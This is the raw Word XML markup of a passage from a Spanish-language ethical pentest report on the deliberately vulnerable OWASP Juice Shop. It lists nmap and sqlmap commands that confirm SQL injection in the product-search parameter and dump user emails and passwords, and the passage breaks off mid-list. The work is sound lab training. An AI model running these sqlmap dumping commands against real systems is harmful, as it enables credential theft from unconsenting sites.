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B83C0" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Informe de Pentest Ético sobre OWASP Juice Shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E69BEAF" w14:textId="61601A14" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivo General:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve"> Realizar una auditoría de seguridad básica y documentada sobre el entorno vulnerable OWASP Juice Shop, simulando un escenario de hacking ético paso a paso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30666653" w14:textId="63704016" w:rsidR="002426EF" w:rsidRPr="002426EF" w:rsidRDefault="007D7E61" w:rsidP="002C1BDB">
      <w:pPr>
        <w:pStyle w:val="Estilo1"/>
        <w:rPr>
          <w:rStyle w:val="Estilo1Car"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002426EF">
        <w:rPr>
          <w:rStyle w:val="Estilo1Car"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Instalación de Herramientas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C4F959" w14:textId="17D1BFF7" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="002426EF">
      <w:r w:rsidRPr="007D7E61">
        <w:t>Se preparó un entorno Kali Linux, instalando las herramientas necesarias para el pentest. Las utilidades clave utilizadas fueron Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve"> SQLMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649E8087" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve">sudo apt update </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB5B9E6" w14:textId="7AD0ABA6" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install -y nmap sqlmap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A973E2" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve">Verificación de versiones: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CFA24F" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve">nmap --version </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABDDE04" w14:textId="2FC1BB3B" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve">sqlmap --version </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AC4627" w14:textId="0A28A7C1" w:rsidR="002426EF" w:rsidRPr="002426EF" w:rsidRDefault="007D7E61" w:rsidP="002C1BDB">
      <w:pPr>
        <w:pStyle w:val="Estilo1"/>
        <w:rPr>
          <w:rStyle w:val="Estilo1Car"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002426EF">
        <w:rPr>
          <w:rStyle w:val="Estilo1Car"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Preparación del Entorno OWASP Juice Shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FAFE9E" w14:textId="0C0BF779" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:r w:rsidRPr="007D7E61">
        <w:t>OWASP Juice Shop fue desplegado utilizando Docker, asegurando un entorno de pruebas aislado y controlado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4806D1F5" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando de despliegue: docker run -d -p 3000:3000 --name juice-shop bkimminich/juice-shop:latest </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48751037" w14:textId="70BAF289" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EF75965" wp14:editId="276EEAE2">
            <wp:extent cx="5943600" cy="378460"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="2564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9513" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="378460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B186AF" w14:textId="00B1A46D" w:rsidR="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t>La aplicación quedó accesible en http://192.168.</w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t>:3000 (la IP debe ser la de la máquina anfitriona donde se ejecuta Docker).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526B68F8" w14:textId="0C03B3BB" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0512CA3B" wp14:editId="3CE4DCE0">
            <wp:extent cx="2257740" cy="238158"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1148319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9106" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2257740" cy="238158"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F06BAB" w14:textId="77777777" w:rsidR="002426EF" w:rsidRPr="002426EF" w:rsidRDefault="007D7E61" w:rsidP="002C1BDB">
      <w:pPr>
        <w:pStyle w:val="Estilo1"/>
      </w:pPr>
      <w:r w:rsidRPr="002426EF">
        <w:rPr>
          <w:rStyle w:val="Estilo1Car"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Verificación de Acceso al Objetivo</w:t>
      </w:r>
      <w:r w:rsidRPr="002426EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D88C9E1" w14:textId="4989DD02" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:r w:rsidRPr="007D7E61">
        <w:t>Se empleó Nmap para confirmar que el puerto 3000 de la aplicación Juice Shop estaba abierto y accesible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B5A290" w14:textId="67F527A5" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t>Comando: nmap -p 3000 192.168.</w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A68BF" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t>Resultado esperado: Puerto 3000/tcp en estado open, confirmando la disponibilidad del servicio HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4678DBD2" w14:textId="54F6856C" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="00D02579">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10696B3C" wp14:editId="383605C1">
            <wp:extent cx="4972744" cy="2048161"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="130536422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4227" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4972744" cy="2048161"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A94F7DE" w14:textId="2F376BA1" w:rsidR="002426EF" w:rsidRDefault="007D7E61" w:rsidP="002C1BDB">
      <w:pPr>
        <w:pStyle w:val="Estilo1"/>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve">Confirmación de Vulnerabilidad SQL Injection (SQLi) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58013995" w14:textId="63478A64" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:r w:rsidRPr="007D7E61">
        <w:t>Se utilizó SQLMap para validar la presencia de una vulnerabilidad de inyección SQL en el parámetro q de la API de búsqueda de productos de Juice Shop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420AECEF" w14:textId="684A7FEF" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: sqlmap -u "http://192.168.100.17:3000/rest/products/search?q=1" --batch --level=2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38306491" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:t>Salida: SQLMap confirmó la inyección SQL y detectó que el motor de la base de datos es SQLite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD1913" w14:textId="6AE82852" w:rsidR="00D02579" w:rsidRPr="007D7E61" w:rsidRDefault="00037CAF" w:rsidP="00D02579">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="675FB178" wp14:editId="686B2332">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2542260</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3710470</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="487080" cy="248400"/>
                <wp:effectExtent l="38100" t="38100" r="27305" b="37465"/>
                <wp:wrapNone/>
                <wp:docPr id="1511641611" name="Entrada de lápiz 3"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId8">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="487080" cy="248400"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shapetype w14:anchorId="3BA73A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199.7pt;margin-top:291.65pt;width:39.3pt;height:2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">
                <v:imagedata r:id="rId9" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D02579">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="691BE4EC" wp14:editId="331A1171">
            <wp:extent cx="5202939" cy="4152900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="256294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4419" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5222026" cy="4168135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B875696" w14:textId="29B67420" w:rsidR="002426EF" w:rsidRDefault="007D7E61" w:rsidP="002C1BDB">
      <w:pPr>
        <w:pStyle w:val="Estilo1"/>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:lastRenderedPageBreak/>
        <w:t>Enumeración y Extracción de Datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338EDD0D" w14:textId="0A1BE75B" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve"> Una vez confirmada la SQLi, se procedió a enumerar y extraer datos sensibles de la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC3156A" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Ver bases de datos:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7919473D" w14:textId="34AE31B8" w:rsidR="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Comando: sqlmap -u "http://</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t>192.168.</w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:3000/rest/products/search?q=1" --batch --level=2 --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A1B595" w14:textId="76CD4855" w:rsidR="00D02579" w:rsidRPr="007D7E61" w:rsidRDefault="00D02579" w:rsidP="002426EF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C5CD4E6" wp14:editId="421BD60B">
            <wp:extent cx="3083357" cy="2676525"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1948670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7060" name="Imagen 1" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3094178" cy="2685918"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CEF727" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Ver tablas de la base de datos 'main':</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EC8714" w14:textId="40EF3AC3" w:rsidR="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Comando: sqlmap -u "http://192.168.100.17:3000/rest/products/search?q=1" --batch --level=2 -D main --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F04357C" w14:textId="1584616A" w:rsidR="00D02579" w:rsidRPr="007D7E61" w:rsidRDefault="00D02579" w:rsidP="00D02579">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1299E2CC" wp14:editId="3B444938">
            <wp:extent cx="3057525" cy="2387222"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="956515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5347" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3090034" cy="2412604"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54070A64" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.3 Ver columnas de la tabla 'Users' en la base de datos 'main':</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D268F8C" w14:textId="0BDD5C6A" w:rsidR="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: sqlmap -u "http://192.168.100.17:3000/rest/products/search?q=1" --batch --level=2 -D main -T Users --columns </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F801CA" w14:textId="251B7C08" w:rsidR="00D02579" w:rsidRPr="007D7E61" w:rsidRDefault="00D02579" w:rsidP="00D02579">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A720D82" wp14:editId="6D5D88F2">
            <wp:extent cx="4733925" cy="2706834"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9955866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6659" name="Imagen 1" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4737966" cy="2709144"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5DB2F2" w14:textId="77777777" w:rsidR="007D7E61" w:rsidRPr="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Extraer correos y contraseñas de la tabla 'Users':</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A6B387" w14:textId="462F12C4" w:rsidR="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Comando: sqlmap -u "http://192.168.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D02579">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D02579">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7E61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:3000/rest/products/search?q=1" --batch --level=2 -D main -T Users -C email, password --dump </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D96A74A" w14:textId="3AF78A5A" w:rsidR="00D02579" w:rsidRPr="007D7E61" w:rsidRDefault="00D02579" w:rsidP="00D02579">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45837756" wp14:editId="252EEA33">
            <wp:extent cx="4781550" cy="2770847"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1123587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703" name="Imagen 1" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4782905" cy="2771632"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A41EBB4" w14:textId="2EA12252" w:rsidR="007D7E61" w:rsidRDefault="007D7E61" w:rsidP="007D7E61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
